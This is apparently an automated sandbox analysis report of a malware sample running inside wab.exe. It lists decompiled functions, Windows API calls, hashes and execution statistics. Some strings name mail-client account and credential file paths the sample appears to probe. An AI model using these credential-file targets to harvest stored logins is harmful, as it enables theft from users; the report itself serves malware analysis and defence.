                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: ErrorLast$_free$_abort
                      • String ID:
                      • API String ID: 3160817290-0
                      • Opcode ID: 4cbe510852b2c4f65c461f0a53446a307ca3e735fd63225fe2584b6af6f1f4df
                      • Instruction ID: 4b39aa8e810771b8f66aa16530136fac57f63fd99c68f8b96b77ae37a457aa79
                      • Opcode Fuzzy Hash: 4cbe510852b2c4f65c461f0a53446a307ca3e735fd63225fe2584b6af6f1f4df
                      • Instruction Fuzzy Hash: 14F0A432504508EBE34216347C48E2A2A79DBE1971B240134F9DAA6985FE25C506E165
                      APIs
                        • Part of subcall function 24571E89: lstrlenW.KERNEL32(?,?,?,?,?,245710DF,?,?,?,00000000), ref: 24571E9A
                        • Part of subcall function 24571E89: lstrcatW.KERNEL32(?,?), ref: 24571EAC
                        • Part of subcall function 24571E89: lstrlenW.KERNEL32(?,?,245710DF,?,?,?,00000000), ref: 24571EB3
                        • Part of subcall function 24571E89: lstrlenW.KERNEL32(?,?,245710DF,?,?,?,00000000), ref: 24571EC8
                        • Part of subcall function 24571E89: lstrcatW.KERNEL32(?,245710DF), ref: 24571ED3
                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2457122A
                        • Part of subcall function 2457173A: _strlen.LIBCMT ref: 24571855
                        • Part of subcall function 2457173A: _strlen.LIBCMT ref: 24571869
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                      • API String ID: 4036392271-1520055953
                      • Opcode ID: b2dda502b04e251c00eeb89ec041aa6e46e4ea8b174dfdd7363ebf9e1b5b7e6b
                      • Instruction ID: 3e44a54a9cc66a52b9b1d220117b83ba88be6b8dcbc682235da83afbca9adc3a
                      • Opcode Fuzzy Hash: b2dda502b04e251c00eeb89ec041aa6e46e4ea8b174dfdd7363ebf9e1b5b7e6b
                      • Instruction Fuzzy Hash: A621D7B9E102086BF7119790EC91FED7339EF90715F001556FA44EB2D8EAB15E80C758
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,24574AEA,?,?,24574A8A,?,24582238,?,24574BBD,00000000,00000000), ref: 24574B59
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 24574B6C
                      • FreeLibrary.KERNEL32(00000000,?,?,?,24574AEA,?,?,24574A8A,?,24582238,?,24574BBD,00000000,00000000,00000001,24572082), ref: 24574B8F
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: e00ff39a584b8bf39b36ac89d991b6d9e31fb28ad7d68882700aa297ef48009f
                      • Instruction ID: e4323fb84e8057f7c64ee79eecf9285f33c311a430778f771dd30b011d7603f9
                      • Opcode Fuzzy Hash: e00ff39a584b8bf39b36ac89d991b6d9e31fb28ad7d68882700aa297ef48009f
                      • Instruction Fuzzy Hash: A9F04F31901118BFDB119FA1DC48F9DBFB9FF45351F004174F989B6190EB399945DA90
                      APIs
                      • _strlen.LIBCMT ref: 24571607
                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2457190E,?,?,00000000,?,00000000), ref: 24571643
                      • lstrcatW.KERNEL32(?,?), ref: 2457165A
                      • lstrlenW.KERNEL32(?,?,?,?,?,2457190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 24571661
                      • lstrcatW.KERNEL32(00001008,?), ref: 24571686
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: lstrcatlstrlen$_strlen
                      • String ID:
                      • API String ID: 3802368996-0
                      • Opcode ID: e726ffb66f9a3003b1ea81c433d3f0a9038cd0ee3fd50cbddc875244daec38d8
                      • Instruction ID: 8ba989805d6b4aa4a426ed8b8a22ab59a4a9b0750d0c47e30f366db01c9f084d
                      • Opcode Fuzzy Hash: e726ffb66f9a3003b1ea81c433d3f0a9038cd0ee3fd50cbddc875244daec38d8
                      • Instruction Fuzzy Hash: 9121DA36900204BBD705DB54EC84EEE7BBCEF89710F14403AE544BB289EB34E945E7A5
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 2457715C
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2457717F
                        • Part of subcall function 245756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 24575702
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 245771A5
                      • _free.LIBCMT ref: 245771B8
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 245771C7
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                      • String ID:
                      • API String ID: 336800556-0
                      • Opcode ID: 5248ccca7e7d1e4b80b59c81c13c9306b1908ffe5e4da422a91406771d9d8fb7
                      • Instruction ID: c525bebfa871745a827998cd117cd464d252313415044ca0f77261f050b82fdb
                      • Opcode Fuzzy Hash: 5248ccca7e7d1e4b80b59c81c13c9306b1908ffe5e4da422a91406771d9d8fb7
                      • Instruction Fuzzy Hash: D6018472602A157B27111AB67C88D7B6E7DEBC2AE03100179FD84D7244FA649C02A2B4
                      APIs
                      • GetLastError.KERNEL32(00000000,?,00000000,2457636D,24575713,00000000,?,24572249,?,?,24571D66,00000000,?,?,00000000), ref: 24575B7F
                      • _free.LIBCMT ref: 24575BB4
                      • _free.LIBCMT ref: 24575BDB
                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24575BE8
                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24575BF1
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: ErrorLast$_free
                      • String ID:
                      • API String ID: 3170660625-0
                      • Opcode ID: 03b5d398e04abb92171c0999f069562335208894f3d0c84dba2842b8fbe9120a
                      • Instruction ID: 7726e4f47071e7180fd1ea906610d1ba56121edad1b0edeb245d29013210bbb0
                      • Opcode Fuzzy Hash: 03b5d398e04abb92171c0999f069562335208894f3d0c84dba2842b8fbe9120a
                      • Instruction Fuzzy Hash: D001F972204609EBE30316342C84D2B2A79EBD15707100078FDDFA6585FF64C906E124
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,?,?,245710DF,?,?,?,00000000), ref: 24571E9A
                      • lstrcatW.KERNEL32(?,?), ref: 24571EAC
                      • lstrlenW.KERNEL32(?,?,245710DF,?,?,?,00000000), ref: 24571EB3
                      • lstrlenW.KERNEL32(?,?,245710DF,?,?,?,00000000), ref: 24571EC8
                      • lstrcatW.KERNEL32(?,245710DF), ref: 24571ED3
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: lstrlen$lstrcat
                      • String ID:
                      • API String ID: 493641738-0
                      • Opcode ID: 6ab27bdec3be0afa123fa7f8c8dee9d7f40d137ab1ffc0d9a51a8e5d3a8b275e
                      • Instruction ID: 47da93a1dc9b9ad8dafe0d4ae350f2f88829eaa4d051c756a731ce4f9987bd8b
                      • Opcode Fuzzy Hash: 6ab27bdec3be0afa123fa7f8c8dee9d7f40d137ab1ffc0d9a51a8e5d3a8b275e
                      • Instruction Fuzzy Hash: 6BF089261001107AE6212729BC85E7F7F7CFFC5A60B040029FA4897290FB54584692B5
                      APIs
                      • _free.LIBCMT ref: 245791D0
                        • Part of subcall function 2457571E: HeapFree.KERNEL32(00000000,00000000,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?), ref: 24575734
                        • Part of subcall function 2457571E: GetLastError.KERNEL32(?,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?,?), ref: 24575746
                      • _free.LIBCMT ref: 245791E2
                      • _free.LIBCMT ref: 245791F4
                      • _free.LIBCMT ref: 24579206
                      • _free.LIBCMT ref: 24579218
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 41df7cf1b976dda6e9e13fc56b42f81f14988484857fda2720c3c0d36e8ae434
                      • Instruction ID: 2083bea8307f4c696d99d8c981334d1621e771a105907ce73618818088c9cb36
                      • Opcode Fuzzy Hash: 41df7cf1b976dda6e9e13fc56b42f81f14988484857fda2720c3c0d36e8ae434
                      • Instruction Fuzzy Hash: 9CF06271524644A7A610DB58E5C4C0E7FF9FB943907501829FACAE7904CB35F8C09A64
                      APIs
                      • _free.LIBCMT ref: 2457536F
                        • Part of subcall function 2457571E: HeapFree.KERNEL32(00000000,00000000,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?), ref: 24575734
                        • Part of subcall function 2457571E: GetLastError.KERNEL32(?,?,2457924F,?,00000000,?,00000000,?,24579276,?,00000007,?,?,24577E5A,?,?), ref: 24575746
                      • _free.LIBCMT ref: 24575381
                      • _free.LIBCMT ref: 24575394
                      • _free.LIBCMT ref: 245753A5
                      • _free.LIBCMT ref: 245753B6
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 836851c52b46a5b878917c1b372fe28f0c1e77369b46353ec803cc016625d5cd
                      • Instruction ID: 11957107b8ec56fce1856f1919a6edf75ce7f230e8075cb74f47e548b93e09a2
                      • Opcode Fuzzy Hash: 836851c52b46a5b878917c1b372fe28f0c1e77369b46353ec803cc016625d5cd
                      • Instruction Fuzzy Hash: 7EF0FE70825128DBE7015F3499C14083FB1FBA5660341251AF8D1B7669EFBE89C2EBC4
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 24574C1D
                      • _free.LIBCMT ref: 24574CE8
                      • _free.LIBCMT ref: 24574CF2
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _free$FileModuleName
                      • String ID: C:\Program Files (x86)\windows mail\wab.exe
                      • API String ID: 2506810119-3377118234
                      • Opcode ID: a870ebf0ae0a031daade236eaf2217e335092a1ef3af622af4b125f7e04194bb
                      • Instruction ID: 768f7ce065676b8b35018637bec55048b8a398c32591369ca28baacfd877649f
                      • Opcode Fuzzy Hash: a870ebf0ae0a031daade236eaf2217e335092a1ef3af622af4b125f7e04194bb
                      • Instruction Fuzzy Hash: 04318271E00218EFDB11CF99D980D9EBFFCEB96710F1041B6E984A7211DB758A81EB90
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,24576FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 24578731
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 245787BA
                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 245787CC
                      • __freea.LIBCMT ref: 245787D5
                        • Part of subcall function 245756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 24575702
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                      • String ID:
                      • API String ID: 2652629310-0
                      • Opcode ID: 32eccab47b3eeedf46ca03be4923ffbac4b84456d4246ad58a52151b9bb83370
                      • Instruction ID: a2b93adf30dae5c715fc3b130865624d2da703dd2a8def2b1e5fcc440153f46b
                      • Opcode Fuzzy Hash: 32eccab47b3eeedf46ca03be4923ffbac4b84456d4246ad58a52151b9bb83370
                      • Instruction Fuzzy Hash: A031AD32A0021AABDF158F65DC85DBF7BB5EB40310F000178FD45EA190E73AD954EBA0
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,24571D66,00000000,00000000,?,24575C88,24571D66,00000000,00000000,00000000,?,24575E85,00000006,FlsSetValue), ref: 24575D13
                      • GetLastError.KERNEL32(?,24575C88,24571D66,00000000,00000000,00000000,?,24575E85,00000006,FlsSetValue,2457E190,FlsSetValue,00000000,00000364,?,24575BC8), ref: 24575D1F
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,24575C88,24571D66,00000000,00000000,00000000,?,24575E85,00000006,FlsSetValue,2457E190,FlsSetValue,00000000), ref: 24575D2D
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID:
                      • API String ID: 3177248105-0
                      • Opcode ID: 2f764f75fccb3e9dcc088d38db8217702b286d3d02a13da626c6732271cda2d6
                      • Instruction ID: 75998b618f13b51d1d32e97f6d34666b07202ec050308e53de33a72c84846bff
                      • Opcode Fuzzy Hash: 2f764f75fccb3e9dcc088d38db8217702b286d3d02a13da626c6732271cda2d6
                      • Instruction Fuzzy Hash: 6B01A73671222ABBC7124A79AC4CF467B68FF456B17104A30FA89E7580E725DA05CAE0
                      APIs
                      • _free.LIBCMT ref: 2457655C
                        • Part of subcall function 245762BC: IsProcessorFeaturePresent.KERNEL32(00000017,245762AB,00000000,?,?,?,?,00000016,?,?,245762B8,00000000,00000000,00000000,00000000,00000000), ref: 245762BE
                        • Part of subcall function 245762BC: GetCurrentProcess.KERNEL32(C0000417), ref: 245762E0
                        • Part of subcall function 245762BC: TerminateProcess.KERNEL32(00000000), ref: 245762E7
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                      • String ID: *?$.
                      • API String ID: 2667617558-3972193922
                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                      • Instruction ID: 38b57c91c676c8d91c3a8a4f24ade9f4466e3940df275c8c52aea4ebf948424a
                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                      • Instruction Fuzzy Hash: 12519475E00209AFDB05CFA8D880AADBBF5EF98724F144179D594E7305E635DA01EB50
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID: : $Se.
                      • API String ID: 4218353326-4089948878
                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                      • Instruction ID: e3c5bbc70e7108c6af857050f21690af73bcccc63c46d608222c3af26496ec52
                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                      • Instruction Fuzzy Hash: D4110671D00288AEDB11CFA8D840BDEFBFDEF59204F10406AE585EB252E6709B02D765
                      APIs
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 24572903
                        • Part of subcall function 245735D2: RaiseException.KERNEL32(?,?,?,24572925,00000000,00000000,00000000,?,?,?,?,?,24572925,?,245821B8), ref: 24573632
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 24572920
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID: Exception@8Throw$ExceptionRaise
                      • String ID: Unknown exception
                      • API String ID: 3476068407-410509341
                      • Opcode ID: 3e343a748f437fb1fb0738bcc8750d34bb88e59525106b6cb699474f8df2e326
                      • Instruction ID: c029eb827a8c797f9ade7c3a100cdd08081a8e67ccc6623e1e568d45b0041d85
                      • Opcode Fuzzy Hash: 3e343a748f437fb1fb0738bcc8750d34bb88e59525106b6cb699474f8df2e326
                      • Instruction Fuzzy Hash: 8CF02834A0030C739B00A6A5FC84D9D3BBC9F51650B508570FAD4AE095FF31EA56F5C0
                      APIs
                      • GetOEMCP.KERNEL32(00000000,?,?,24576C7C,?), ref: 24576A1E
                      • GetACP.KERNEL32(00000000,?,?,24576C7C,?), ref: 24576A35
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000002.2560967148.0000000024571000.00000040.00001000.00020000.00000000.sdmp, Offset: 24570000, based on PE: true
                      • Associated: 00000011.00000002.2560933025.0000000024570000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000011.00000002.2560967148.0000000024586000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_17_2_24570000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID: |lW$
                      • API String ID: 0-2291785022
                      • Opcode ID: 4213143e3df75704345c192f8d0a85542272502c93eb9d5adef3b2b860ea2e3a
                      • Instruction ID: 239eb2081a0423fbaab8493c3ce97a01e9656becec886604a2d6b3b65a944097
                      • Opcode Fuzzy Hash: 4213143e3df75704345c192f8d0a85542272502c93eb9d5adef3b2b860ea2e3a
                      • Instruction Fuzzy Hash: 64F04930900149CFD700DB68D448B6C7BB0FF40735F1497A8F4B89A1D6EBBA999ADB81

                      Execution Graph

                      Execution Coverage:6.3%
                      Dynamic/Decrypted Code Coverage:9.2%
                      Signature Coverage:2.4%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:62
                      execution_graph 40365 441a73 148 API calls 40696 441819 40699 430737 40696->40699 40698 441825 40700 430756 40699->40700 40710 43076d 40699->40710 40701 430774 40700->40701 40702 43075f 40700->40702 40714 43034a memcpy 40701->40714 40713 4169a7 11 API calls 40702->40713 40705 4307ce 40706 430819 memset 40705->40706 40715 415b2c 11 API calls 40705->40715 40706->40710 40707 43077e 40707->40705 40707->40710 40711 4307fa 40707->40711 40709 4307e9 40709->40706 40709->40710 40710->40698 40716 4169a7 11 API calls 40711->40716 40713->40710 40714->40707 40715->40709 40716->40710 37672 442ec6 19 API calls 37845 4152c6 malloc 37846 4152e2 37845->37846 37847 4152ef 37845->37847 37849 416760 11 API calls 37847->37849 37849->37846 38472 4466f4 38491 446904 38472->38491 38474 446700 GetModuleHandleA 38477 446710 __set_app_type __p__fmode __p__commode 38474->38477 38476 4467a4 38478 4467ac __setusermatherr 38476->38478 38479 4467b8 38476->38479 38477->38476 38478->38479 38492 4468f0 _controlfp 38479->38492 38481 4467bd _initterm __wgetmainargs _initterm 38483 44681e GetStartupInfoW 38481->38483 38484 446810 38481->38484 38485 446866 GetModuleHandleA 38483->38485 38493 41276d 38485->38493 38489 446896 exit 38490 44689d _cexit 38489->38490 38490->38484 38491->38474 38492->38481 38494 41277d 38493->38494 38536 4044a4 LoadLibraryW 38494->38536 38496 412785 38528 412789 38496->38528 38544 414b81 38496->38544 38499 4127c8 38550 412465 memset ??2@YAPAXI 38499->38550 38501 4127ea 38562 40ac21 38501->38562 38506 412813 38580 40dd07 memset 38506->38580 38507 412827 38585 40db69 memset 38507->38585 38510 412822 38606 4125b6 ??3@YAXPAX 38510->38606 38512 40ada2 _wcsicmp 38513 41283d 38512->38513 38513->38510 38516 412863 CoInitialize 38513->38516 38590 41268e 38513->38590 38610 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38516->38610 38520 41296f 38612 40b633 38520->38612 38523 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW 
GetMessageW 38527 412957 38523->38527 38533 4128ca 38523->38533 38527->38510 38528->38489 38528->38490 38529 4128d0 TranslateAcceleratorW 38530 412941 GetMessageW 38529->38530 38529->38533 38530->38527 38530->38529 38531 412909 IsDialogMessageW 38531->38530 38531->38533 38532 4128fd IsDialogMessageW 38532->38530 38532->38531 38533->38529 38533->38531 38533->38532 38534 41292b TranslateMessage DispatchMessageW 38533->38534 38535 41291f IsDialogMessageW 38533->38535 38534->38530 38535->38530 38535->38534 38537 4044cf GetProcAddress 38536->38537 38540 4044f7 38536->38540 38538 4044e8 FreeLibrary 38537->38538 38541 4044df 38537->38541 38539 4044f3 38538->38539 38538->38540 38539->38540 38542 404507 MessageBoxW 38540->38542 38543 40451e 38540->38543 38541->38538 38542->38496 38543->38496 38545 414b8a 38544->38545 38546 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38544->38546 38616 40a804 memset 38545->38616 38546->38499 38549 414b9e GetProcAddress 38549->38546 38552 4124e0 38550->38552 38551 412505 ??2@YAPAXI 38553 41251c 38551->38553 38555 412521 38551->38555 38552->38551 38638 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38553->38638 38627 444722 38555->38627 38561 41259b wcscpy 38561->38501 38643 40b1ab ??3@YAXPAX ??3@YAXPAX 38562->38643 38566 40ad4b 38575 40ad76 38566->38575 38656 40a9ce 38566->38656 38567 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 38569 40ac5c 38567->38569 38569->38566 38569->38567 38570 40ace7 ??3@YAXPAX 38569->38570 38569->38575 38647 40a8d0 7 API calls 38569->38647 38648 4099f4 38569->38648 38570->38569 38644 40aa04 38575->38644 38576 40ada2 38577 40adc9 38576->38577 38578 40adaa 38576->38578 38577->38506 38577->38507 38578->38577 38579 40adb3 _wcsicmp 38578->38579 38579->38577 38579->38578 38662 40dce0 38580->38662 38582 40dd3a GetModuleHandleW 38667 40dba7 38582->38667 38586 40dce0 3 API calls 38585->38586 38587 40db99 38586->38587 38739 40dae1 38587->38739 38753 402f3a 38590->38753 38592 412766 38592->38510 
38592->38516 38593 4126d3 _wcsicmp 38594 4126a8 38593->38594 38594->38592 38594->38593 38596 41270a 38594->38596 38788 4125f8 7 API calls 38594->38788 38596->38592 38756 411ac5 38596->38756 38607 4125da 38606->38607 38608 4125f0 38607->38608 38609 4125e6 DeleteObject 38607->38609 38611 40b1ab ??3@YAXPAX ??3@YAXPAX 38608->38611 38609->38608 38610->38523 38611->38520 38613 40b640 38612->38613 38614 40b639 ??3@YAXPAX 38612->38614 38615 40b1ab ??3@YAXPAX ??3@YAXPAX 38613->38615 38614->38613 38615->38528 38617 40a83b GetSystemDirectoryW 38616->38617 38618 40a84c wcscpy 38616->38618 38617->38618 38623 409719 wcslen 38618->38623 38621 40a881 LoadLibraryW 38622 40a886 38621->38622 38622->38546 38622->38549 38624 409724 38623->38624 38625 409739 wcscat LoadLibraryW 38623->38625 38624->38625 38626 40972c wcscat 38624->38626 38625->38621 38625->38622 38626->38625 38628 444732 38627->38628 38629 444728 DeleteObject 38627->38629 38639 409cc3 38628->38639 38629->38628 38631 412551 38632 4010f9 38631->38632 38633 401130 38632->38633 38634 401134 GetModuleHandleW LoadIconW 38633->38634 38635 401107 wcsncat 38633->38635 38636 40a7be 38634->38636 38635->38633 38637 40a7d2 38636->38637 38637->38561 38637->38637 38638->38555 38642 409bfd memset wcscpy 38639->38642 38641 409cdb CreateFontIndirectW 38641->38631 38642->38641 38643->38569 38645 40aa14 38644->38645 38646 40aa0a ??3@YAXPAX 38644->38646 38645->38576 38646->38645 38647->38569 38649 409a41 38648->38649 38650 4099fb malloc 38648->38650 38649->38569 38652 409a37 38650->38652 38653 409a1c 38650->38653 38652->38569 38654 409a30 ??3@YAXPAX 38653->38654 38655 409a20 memcpy 38653->38655 38654->38652 38655->38654 38657 40a9e7 38656->38657 38658 40a9dc ??3@YAXPAX 38656->38658 38660 4099f4 3 API calls 38657->38660 38659 40a9f2 38658->38659 38661 40a8d0 7 API calls 38659->38661 38660->38659 38661->38575 38686 409bca GetModuleFileNameW 38662->38686 38664 40dce6 wcsrchr 38665 40dcf5 38664->38665 38666 40dcf9 wcscat 38664->38666 
